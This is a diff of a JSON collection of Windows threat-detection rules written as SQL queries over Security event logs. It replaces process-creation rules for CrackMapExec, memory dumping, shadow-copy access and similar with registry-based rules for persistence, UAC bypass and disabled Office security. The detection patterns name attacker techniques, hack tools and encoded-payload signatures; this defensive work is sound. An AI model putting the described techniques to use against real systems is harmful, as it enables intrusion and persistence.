'\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' 
ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 
'%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": 
"registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + 
"author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE 
'\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE 
'%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' 
ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE 
'%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE 
'\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - 